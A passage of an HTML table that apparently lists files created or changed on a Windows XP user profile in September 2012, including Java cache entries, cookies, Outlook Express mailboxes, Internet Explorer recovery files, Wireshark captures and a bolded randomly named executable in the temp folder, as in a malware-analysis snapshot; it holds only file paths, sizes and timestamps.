<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\38</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\39</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\4</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\40</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\41</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\42</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\43</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\44</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\45</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\46</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\47</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\48</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\49</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\5</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\50</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\51</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\52</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\53</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\54</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\55</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\56</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\57</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\58</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\59</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\6</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\60</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\61</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\62</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\63</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\7</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\8</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\9</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\lastAccessed</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\GTT5VL6M.txt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:58 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\HR7RSVJY.txt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:37 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\OCZY31FB.txt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:38 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\SQUKNA2Q.txt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Folders.dbx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">76KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:40 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Inbox.dbx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">143KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:39 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Offline.dbx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">10KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:40 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Sent Items.dbx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">77KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:39 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{8CFA7582-04D2-11E2-A16C-08002765500A}.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">5KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{8CFA7583-04D2-11E2-A16C-08002765500A}.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">28KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:27 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{B1CEB060-04D2-11E2-A16C-08002765500A}.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:24 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{CE9EB670-04D2-11E2-A16C-08002765500A}.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">12KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:44 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{E0F1E810-04D2-11E2-A16C-08002765500A}.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">12KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:03 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{ED37A190-04D2-11E2-A16C-08002765500A}.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">4KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:17 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temp\au-descriptor-1.6.0_35-b10.xml</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">8KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:11 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temp\V.class</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">7KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:03 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;"><b>C:\Documents and Settings\bomber\Local Settings\Temp\wgsdgsdgdsgsd.exe</b></span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">289KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:06 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temp\wireshark_D6F459B6-57F0-41B4-99AF-16CEB1102BB5_20120922123113_a02096</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1,026KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:32:07 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temp\wireshark_D6F459B6-57F0-41B4-99AF-16CEB1102BB5_20120922123320_a03904</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1,999KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;"><b>C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\1864</b></span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">66KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;"><b>C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\2424</b></span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">66KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:59 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\de[1].png</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:41 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\domainmap[3].gif</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:59 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\hcp_asx[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\hcp_asx[2].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:02 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\login[2].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">12KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:37 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\ro[1].png</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:42 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCA5PUYED</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCA704DOF</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAEF3BT4</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAEOTJ4L</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAVO38L3</span></td>
<td></td>
